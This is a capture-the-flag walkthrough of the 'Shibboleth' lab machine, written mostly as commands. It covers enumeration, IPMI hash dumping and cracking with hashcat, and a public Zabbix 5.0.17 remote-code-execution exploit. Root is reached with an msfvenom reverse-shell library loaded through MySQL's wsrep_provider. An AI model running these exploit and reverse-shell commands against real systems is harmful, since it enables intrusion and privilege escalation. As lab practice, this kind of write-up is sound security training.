/etc/hosts
10.10.11.124 shibboleth.htb
nmap
1 | nmap -sV shibboleth.htb |
We only have an apache server.
gobuster
1 | gobuster dir -t 100 -u http://shibboleth.htb/ -w ~/Documents/wordlist/directory-list-medium.txt |
http://shibboleth.htb/forms/

In the Readme.txt we have this:
1 | Fully working PHP/AJAX contact form script is available in the pro version of the template. |
In the contact.php we have this:
1 | Unable to load the "PHP Email Form" Library! |
Subdomain listing
1 | wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains-top1million-5000.txt -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" --hw 26 |
The –hw mean I will exclude every resultats with word 26.

We also have an hint in main page.

gobuster
1 | gobuster dir -t 100 -u http://zabbix.shibboleth.htb -w ~/Documents/wordlist/directory-list-medium.txt -k |
It’s forbiden everywhere.
I found nothing and all the new exploits of zabbix don’t work.
I have to continue the enumeration.
nmap UDP
1 | sudo nmap -sU nmap -sU --min-rate 5000 shibboleth.htb |
The port 623 is open.
Exploit IPMI (port 623)
1 | msfconsole |
Crack the hash
I store the hash in the hash file.
I’m gonna use hashcat to crack it.
1 | hashcat -h |grep IPMI |
Output
1 | 7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocol |
So the command gonna be this one.
1 | hashcat -m 7300 -a 0 hash /home/peanutstick/Documents/wordlist/rockyou.txt |

I have a password.
Zabbix

As we can see it’s Zabbix 5.0.17.
I’m gonna use this exploit.
https://packetstormsecurity.com/files/166256/Zabbix-5.0.17-Remote-Code-Execution.html
1 | python3 exploit.py http://zabbix.shibboleth.htb Administrator Thepassword 10.10.14.147 4648 |
I’m in.

Privilege escalation
1 | ls /home |
Output
1 | ipmi-svc |
So we have to connect with this user and the password we found in the hash.
1 | su ipmi-svc |
Enum with shell
I have to upgrade the shell first.
1 | python3 -c 'import pty; pty.spawn("/bin/bash")' |
Now let’s se if there is come creds in clear text.
1 | grep --color=auto -rnw '/etc' -ie "Password" --color=always 2> /dev/null |


Exploit mysql
Create the payload
You have to use an another port.
1 | msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.147 LPORT=4649 -f elf-so -o exp.so |
Listen with netcat.
1 | nc -nlvp 4649 |
Upload the payload
On the server
1 | mkdir /tmp/exp |
Execute the payload
1 | mysql -u zabbix -p |
with mysql.
1 | SET GLOBAL wsrep_provider="/tmp/exp/exp.so"; |

I’m root.